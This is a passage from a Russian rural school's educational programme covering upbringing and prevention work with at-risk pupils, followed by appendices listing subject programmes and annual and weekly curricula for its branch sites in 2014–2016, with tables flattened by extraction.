Таким образом, основной путь улучшения состояния дел в воспитании идет через включение в воспитательную деятельность всех работников социокультурной сферы и создание в перспективе единого воспитательного пространства.

                Научно-методическое сопровождение воспитательной системы

Сегодня,  в условиях  модернизации системы образования, предъявляются требования к профессиональной компетенции педагогических работников. Педагог должен уметь на высоком уровне, комплексно и творчески решать сложные профессиональные задачи:

- диагностировать уровень развития обучающихся, выстраивать на основе полученных данных технологические, реально достижимые цели и задачи педагогической деятельности;

- творчески применять известные и разрабатывать авторские образовательные технологии, методические приёмы;

- отбирать целесообразные содержания, способы и средства с учётом зоны ближайшего развития изменяемых познавательных и социальных характеристик учащихся;

- сотрудничать с родителями, общественностью.

В настоящее время востребован не воспитатель или предметник-урокодатель, а педагог-исследователь, педагог-психолог, педагог-технолог.

В МБОУ «Горковская СОШ» это возможно, так как созданы условия для творчески, проблемно и технологично организованного образовательного процесса; учитель имеет возможность активно заниматься научно-методической, поисковой, инновационной работой.

Методическое руководство, обеспечение и помощь при организации общешкольных и классных дел осуществляет методическое объединение классных  руководителей.                                   При проведении массовых мероприятий координируются усилия классных руководителей на этапах подготовки и анализа: в ходе обсуждения уточняются детали, вырабатывается общая стратегия, благодаря чему в ходе реализации замысла к минимуму сводятся недовольства отдельных педагогов – каждый считает решение своим, а не навязанным свыше; разрабатываются и предлагаются анкеты педагогам и учащимся для подведения итогов. В ходе рефлексивного обсуждения определяются причины просчетов, вырабатываются рекомендации, позволяющие учесть их и избежать при планировании внеурочной деятельности в будущем.

 

               Профилактическая воспитательная работа

Дети в школу приходят разные и из разных семей. Мы не делим их на категории, школьные дела – они для всех. И все-таки есть ребята, требующие к себе более внимательного отношения. Основной работой в этом направлении мы считаем профилактическую, в основе которой лежит комплексный подход, единство воспитательных воздействий:

- Выделяем группу «риска» (прогульщики, «переростки», дети с неразвитыми познавательными интересами, имеющие неблагополучное социальное окружение).

- Выясняем и изучаем причины  отклоняющегося  поведения, в том числе факторы, имеющие психологическую природу. Каждый педагог выявляет свой аспект трудновоспитуемости: классный руководитель – неблагоприятные условия жизни и личностные проблемы, учитель-предметник – уровень обученности. Объединение усилий, совместное обсуждение на малых педагогических советах позволяют выработать обоснованную единую стратегию воспитания.

- Проводим индивидуальную и групповую работу, начиная с  младшего школьного возраста, психологическую коррекцию. При этом каждый  использует свои средства и реализует свои задачи: педагог задает систему общественных ценностей и нравственных идеалов, обеспечивает формирование соответствующих психологических механизмов по выбору правильных форм поведения трудного ребенка.

- Учитываем индивидуальные особенности, опираемся на внеучебные интересы ребенка.

- Работаем с детским коллективом по созданию положительного общественного мнения, повышению статуса ребенка. Включаем его в различные классные и школьные дела.

 

 

 

 

 

 

 

 

 

 

 

 

  

                                                                                                  

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

                                                                                                                                   

 

 

 

 

Приложение 1

 

ПЕРЕЧЕНЬ
примерных программ по учебным предметам федерального базисного учебного плана для образовательных учреждений Российской Федерации, реализующих программы основного общего образования

  1. 1.Примерная программа основного общего образования по русскому языку.
  2. 2.Примерная программа основного общего образования по литературе.
  3. 3.Примерная программа основного общего образования по английскому языку. 
  4. 4.Примерная программа основного общего образования по математике. 
  5. 5.Примерная программа основного общего образования по информатике и информационным технологиям. 
  6. 6.Примерная программа основного общего образования по истории.
  7. 7.
  8. 8.Примерная программа основного общего образования по географии.
  9. 9.
  10. 10.Примерная программа основного общего образования по физике. 
  11. 11.Примерная программа основного общего образования по химии.
  12. 12.Примерная программа основного общего образования по биологии. 
  13. 13.Примерная программа основного общего образования по изобразительному искусству. 
  14. 14.Примерная программа основного общего образования по музыке. 
  15. 15.Примерная программа основного общего образования по направлению «Технология. Обслуживающий труд». 
  16. 16.Примерная программа основного общего образования по направлению «Технология. Технический труд». 
  17. 17.Примерная программа основного общего образования по основам безопасности жизнедеятельности. 
  18. 18.Примерная программа основного общего образования по физической культуре. 

 

 

 

 

 

 

 

 

 

 

 

 

 

                                                                                                           Приложение 2

 

ПЕРЕЧЕНЬ
рабочих  программ по учебным предметам

 

  1. 1.Рабочая программа по русскому языку.(5-9 классы)
  2. 2.Рабочая программа по литературе. (5-9 классы)
  3. 3.Рабочая программа по английскому языку. (5-9 классы)
  4. 4.Рабочая программа по математике. (5-9 классы)
  5. 5.Рабочая программа по информатике и информационным технологиям. (8-9 классы)
  6. 6.Рабочая программа по истории. (5-9 классы)
  7. 7.Рабочая программа по обществознанию (включая экономику и право). (6-9 классы)
  8. 8.Рабочая программа по географии. (6-9 классы)
  9. 9.Рабочая программа по природоведению (5 класс). 
  10. 10.Рабочая программа по физике. (7-9 классы)
  11. 11.Рабочая программа по химии. (8-9 классы)
  12. 12.Рабочая программа по биологии. (6-9 классы)
  13. 13.Рабочая программа по изобразительному искусству. (5-7 классы)
  14. 14.Рабочая программа по музыке. (5-7 классы)
  15. 15.Рабочая программа по искусству. (8-9 классы)
  16. 16.Рабочая программа по технологии. (Обслуживающий труд). (5-8 классы)
  17. 17.Рабочая программа по технологии. (Технический труд). (5-8 классы)
  18. 18.Рабочая программа по основам безопасности жизнедеятельности. (8 класс)
  19. 19.Рабочая программа по физической культуре. (5-9 классы)

 

                                                                                                          

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Приложение 3

 

Учебный план (годовой)

МБОУ «Горковская СОШ» д. Согра

на 2015 – 2016 учебный год 

на ступени основного общего образования

Учебные предметы

Количество часов в год

 

6 кл

7 кл

8 кл

9 кл

Всего

Федеральный компонент

Русский язык

204

136

102

68

510

Литература

68

68

68

102

374

Иностранный язык (английский)

102

102

102

102

408

Математика

170

 

 

 

170

Алгебра

 

102

102

102

306

Геометрия

 

68

68

68

204

Информатика и ИКТ

 

 

34

68

102

История

68

68

68

68

272

Обществознание

(включая экономику и право)

34

34

34

34

136

География

68

68

68

68

238

Физика

 

68

68

68

204

Химия

 

 

68

68

136

Биология

68

68

68

68

238

Искусство:

 

ИЗО

34

34

 

 

 

Музыка

34

34

 

 

 

Искусство

 

 

34

34

204

Технология

68

68

34

 

170

ОБЖ

 

 

34

 

34

Физическая культура

102

102

102

102

408

ИТОГО:

1020

1054

1054

1020

3178

Региональный компонент и компонент ОУ

0

68

68 

102

238

Черчение

 

 

34

34

68

Факультативы, спецкурсы:

 

 

 

 

 

  1. 1.«Литература Севера»

 

34

 

 

34

  1. 2.«Азбука астрономии»

 

 

34

 

34

  1. 3.«Русский язык и развитие речи»

 

34

 

 

34

Элективные курсы:

 

 

 

 

 

  1. 1.«Решение задач по физике»

 

 

 

34

34

  1. 2.«Практический курс речеведения»

 

 

 

21

21

  1. 3.Профориентационный курс

 

 

 

13

13

ИТОГО

1020

1088

1122

1122

4352

Предельно допустимая аудиторная учебная нагрузка при 5-дневной учебной неделе

1020

1088

1122

1122

4352

 

Учебный план (недельный)

МБОУ «Горковская СОШ» д. Согра

на 2014 – 2015 учебный год 

на ступени основного общего образования

Учебные предметы

Количество часов в неделю

 

6

 класс

7

класс

8

класс

9

 класс

Всего

Федеральный компонент

Русский язык

6

4

3

2

15

Литература

2

2

2

3

9

Иностранный язык (английский)

3

3

3

3

12

Математика

5

 

 

 

5

Алгебра

 

3

3

3

9

Геометрия

 

2

2

2

6

Информатика и ИКТ

 

 

1

2

3

История

2

2

2

2

8

Обществознание

(включая экономику и право)

1

1

1

1

4

География

2

2

2

2

8

Физика

 

2

2

2

6

Химия

 

 

2

2

4

Биология

2

2

2

2

8

Искусство:

 

ИЗО

1

1

 

 

 

Музыка

1

1

 

 

 

Искусство

 

 

1

1

6

Технология

2

2

1

 

5

ОБЖ

 

 

1

 

1

Физическая культура

3

3

3

3

12

ИТОГО:

28

30

30

30

121

Региональный компонент и компонент ОУ

 

2

2

3

7

Черчение

 

 

1

1

2

Факультативы, спецкурсы:

 

 

 

 

 

  1. 1.«Литература Севера»

 

1

 

 

1

  1. 2.«Русский язык и развитие речи»

 

1

 

 

1

  1. 3.«Азбука астрономии»

 

 

1

 

1

Элективные курсы:

 

 

 

 

 

    1. «Решение задач по физике»

 

 

 

1

1

    1. «Практический курс речеведения»

 

 

 

0,6

0,6

    1. Профориентационный курс

 

 

 

0,4

0,4

ИТОГО

30

32

33

33

128

Предельно допустимая аудиторная учебная нагрузка при 5-дневной учебной неделе

30

32

33

33

128

 

Учебный план (годовой)

МБОУ «Горковская СОШ» п Палова

на 2015 – 2016 учебный год 

на ступени основного общего образования

Учебные предметы

Количество часов в год

 

6

 класс

7

класс

8

класс

Всего

Федеральный компонент

Русский язык

204

136

102

442

Литература

68

68

68

204

Иностранный язык (английский)

102

102

102

306

Математика

170

 

 

170

Алгебра

 

102

102

204

Геометрия

 

68

68

102

Информатика и ИКТ

 

 

34

34

История

68

68

68

204

Обществознание

(включая экономику и право)

34

34

34

102

География

68

68

68

204

Физика

 

68

68

136

Химия

 

 

68

68

Биология

68

68

68

204

Искусство:

 

ИЗО

34

34

 

 

Музыка

34

34

 

 

Искусство

 

 

34

170

Технология

68

68

34

170

ОБЖ

 

 

34

34

Физическая культура

102

102

102

306

ИТОГО:

1020

1020

1054

3060

Региональный компонент и компонент ОУ

0

68

68 

136

Факультативы, спецкурсы:

 

 

 

 

    1. «Занимательный английский»

 

 

 

17

  1. 2.«Лес и человек»

 

10

 

10

  1. 3.«Служит людям ветеринария»

 

7

 

7

  1. 4.«Физика. Человек. Окружающая среда»

 

17

 

17

  1. 5.«Математика для любознательных»

 

17

 

17

  1. 6.«Государственные символы России»

 

17

 

17

  1. 7.Архитектура и дизайн в жизни человека»

 

 

34

17

  1. 8.«Препараты бытовой химии в нашем доме»

 

 

17

17

  1. 9.«Самый простой способ решения непростых неравенств и задач по планиметрии»

 

 

17

17

ИТОГО

1020

1088

1122

3230

Предельно допустимая аудиторная учебная нагрузка при 5-дневной учебной неделе

1020

1088

1122

3230

 

Учебный план (недельный)

МБОУ «Горковская СОШ» п Палова

на 2015 – 2016 учебный год 

на ступени основного общего образования

Учебные предметы

Количество часов в год

 

6

 класс

7

класс

8

класс

Всего

Федеральный компонент

Русский язык

6

4

3

13

Литература

2

2

2

6

Иностранный язык (английский)

3

3

3

9

Математика

5

 

 

5

Алгебра

 

3

3

6

Геометрия

 

2

2

4

Информатика и ИКТ

 

 

1

1

История

2

2

2

6

Обществознание

(включая экономику и право)

1

1

1

3

География

2

2

2

6

Физика

 

2

2

4

Химия

 

 

2

2

Биология

2

2

2

6

Искусство:

 

ИЗО

1

1

 

 

Музыка

1

1

 

 

Искусство

 

 

1

5

Технология

2

2

1

7

ОБЖ

 

 

1

1

Физическая культура

3

3

3

9

ИТОГО:

30

30

31

91

Региональный компонент и компонент ОУ

0

2

2

4

Факультативы, спецкурсы:

 

 

 

 

  1. 1.«Занимательный английский»

 

 

 

0,5

  1. 2.«Лес и человек»

 

0,3

 

0,3

  1. 3.«Служит людям ветеринария»

 

0,2

 

0,2

  1. 4.«Физика. Человек. Окружающая среда»

 

0,5

 

0,5

  1. 5.«Математика для любознательных»

 

0,5

 

0,5

  1. 6.«Государственные символы России»

 

0,5

 

0,5

  1. 7.Архитектура и дизайн в жизни человека»

 

 

1

1

  1. 8.«Препараты бытовой химии в нашем доме»

 

 

0,5

0,5

  1. 9.«Самый простой способ решения непростых неравенств и задач по планиметрии»

 

 

0,5

0,5

ИТОГО

30

32

33

95

Предельно допустимая аудиторная учебная нагрузка при 5-дневной учебной неделе

30

32

33

95

 

Учебный план (годовой)

МБОУ «Горковская СОШ» п. Ламбас

на 2015 – 2016 учебный год 

на ступени основного общего образования

Учебные предметы

Количество часов в год

 

6 класс

7 класс

Всего

Федеральный компонент

Русский язык

204

136

340

Литература

68

68

136

Иностранный язык (английский)

102

102

204

Математика

170

 

170

Алгебра

 

102

102

Геометрия

 

68

68

История

68

68

136

Обществознание

(включая экономику и право)

34

34

68

География

68

68

136

Физика

 

68

68

Биология

68

68

136

Искусство:

 

ИЗО

34

34

136

Музыка

34

34

Технология

68

68

136

Физическая культура

102

102

204

ИТОГО:

1020

1020

2040

Региональный компонент и компонент ОУ

0

68

68

Факультативы, спецкурсы,

 

 

 

    1. «Литература Севера»

 

34

68

    1. «Основы растровой графики»

 

34

34

ИТОГО

1020

1088

2108

Предельно допустимая аудиторная учебная нагрузка при 5-дневной учебной неделе

1020

1088

2108

 

Учебный план (недельный)

МБОУ «Горковская СОШ» п. Ламбас

на 2015 – 2016 учебный год 

на ступени основного общего образования

Учебные предметы

Количество часов в неделю

 

6 класс

7 класс

Всего

Русский язык

6

4

10

Литература

2

2

4

Иностранный язык (английский)

3

3

6

Математика

5

 

5

Алгебра

 

3

3

Геометрия

 

2

2

История

2

2

4

Обществознание

(включая экономику и право)

1

1

2

География

2

2

4

Физика

 

2

2

Биология

2

2

4

Искусство:

 

ИЗО

1

1

4

Музыка

1

1

Технология

2

2

4

Физическая культура

3

3

6

ИТОГО:

30

30

60

Региональный компонент и компонент ОУ

 

2

2

Факультативы, спецкурсы:

 

 

 

  1. 1.«Литература Севера»

 

1

1

  1. 2.«Основы растровой графики»

 

1

1

ИТОГО

30

32

62

Предельно допустимая аудиторная учебная нагрузка при 5-дневной учебной неделе

30

32

62

 

Учебный план (годовой)

МБОУ «Горковская СОШ» п. Красная

на 2015 – 2016 учебный год 

на ступени основного общего образования

Учебные предметы

Количество часов в год

 

 

6

 класс

7

класс

8

класс

9

 класс

Всего

Федеральный компонент

 

Русский язык

204

136

102

68

510

Литература

68

68

68

102

374

Иностранный язык (английский)

102

102

102

102

408

Математика

170

 

 

 

170

Алгебра

 

102

102

102

306

Геометрия

 

68

68

68

204

Информатика и ИКТ

 

 

34

68

102

История

68

68

68

68

272

Обществознание

(включая экономику и право)

34

34

34

34

136

География

68

68

68

68

272

Физика

 

68

68

68

204

Химия

 

 

68

68

136

Биология

68

68

68

68

238

Искусство:

 

ИЗО

34

34

 

 

 

Музыка

34

34

 

 

 

Искусство

 

 

34

34

204

Технология

68

68

34

 

170

ОБЖ

 

 

34

 

34

Физическая культура

102

102

102

102

408

ИТОГО:

1020

1054

1054

1020

4148

Региональный компонент и компонент образовательного учреждения

0

68

68 

102

238

черчение

 

 

34

34

68

Факультативы, спецкурсы, а именно:

 

 

 

 

 

    1. Литература Севера

 

 

34

 

34

    1. Занимательная география.

 

34

 

 

34

    1. Страноведение.

 

34

 

 

34

Элективные курсы:

 

 

 

 

 

    1. «Решение сюжетных задач»

 

 

 

34